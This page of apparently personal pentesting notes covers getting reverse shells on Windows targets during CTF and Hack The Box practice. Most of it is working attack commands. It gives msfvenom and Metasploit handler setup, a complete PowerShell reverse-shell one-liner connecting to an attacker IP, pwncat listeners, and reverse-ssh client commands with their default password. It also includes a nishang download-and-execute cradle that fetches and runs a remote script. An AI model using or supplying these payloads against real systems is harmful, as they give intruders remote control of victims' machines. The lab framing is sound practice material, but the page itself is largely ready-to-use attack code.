Shells

Normal Shells

LogoShells - WindowsHackTricks

Meterpreter

First, generate the file which, when executed, starts a reverse shell on the targeted host. Here's an example of an aspx shell: 

msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.10.14.73" LPORT=4444 -f aspx -o reverse.aspx

Then, in your attacker machine, run Metasploit and start a handler:

msfconsole 
use exploit/multi/handler 
set payload windows/meterpreter/reverse_tcp 
set LPORT 4444 
set LHOST 10.10.14.73 
run

Replace the port and IP address with your own ones, of course.

Interactive Powershell Reverse Shell

Caveat: stderr doesn't work!

powershell -nop -exec bypass -c "$client = New-Object System.Net.Sockets.TCPClient('IP_ADDRESS_HERE', PORT_NUMBER_HERE);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Full TTY Shells

LogoFull TTYsHackTricks

Pwncat

Caveat: I've tested it on 2 Windows boxes in HTB, and it didn't work in either one.

Probably a good idea to switch to bash if using ZSH: 

exec bash --login

If your target machine doesn't have internet access, then you'll need to download the plugins first: 

pwncat --download-plugins

Listen on port 4444: 

pwncat -m windows -lp 4444

Then connect to the pwncat with either a powershell.exe or cmd.exe reverse shell: 

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.17',8000);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

Reverse SSH Shell

LogoGitHub - Fahrj/reverse-ssh: Statically-linked ssh server with reverse shell functionality for CTFs and suchGitHub

Features:

  • Full TTY shell

  • File sharing via SFTP

  • Port forwarding

Requirements:

  • At least Windows 7 or Windows server 2008 (Windows 10 for conpty, need workaround for lower windows versions for full TTY functionality)

  • Linux kernel version 2.6.23 and higher

Caveats:

  • SCP doesn't seem to work

  • SSH port forwarding doesn't seem to work

  • It hangs sometimes

Evades antivirus: Don't know

First run this on your machine:

./reverse-ssh -v -l :4444

Then the following on the victim machine (you can use the upx packed executable, use ssh-shellhost on older machines):

.\upx_reverse-sshx86.exe -p 4444 kali@ATTACKER_IP

And finally on your machine:

ssh -p 8888 127.0.0.1

The default password is letmeinbrudipls

NB! If the target doesn't have conpty (pre-windows 10, build 17763), then you need the following workaround:

upx_reverse-sshx86.exe -p 4444 -s ssh-shellhost.exe kali@ATTACKER_IP

The shellhost.exe executable needs to be in the same directory. It's an executable from OpenSSH.

Rlwrap with nishang

LogoShells - WindowsHackTricks

Serve the script on your machine. Then download the nishang shell to memory:

powershell iex (New-Object Net.WebClient).DownloadString('http://IP:PORT/Invoke-PowerShellTcp.ps1');

Start a listener on SOME_PORT on the attacker machine. Use rlwrap as explained here (not tested).

Then run the reverse shell. 

Invoke-PowerShellTcp -Reverse -IPAddress ATTACKER_IP -Port SOME_PORT

Socat

I think socat can be used to make a decent reverse shell?

LogoSocat - How to create a windows reverse shellStack Overflow

PreviousCLI TipsNextWindows Script Host

Last updated

Was this helpful?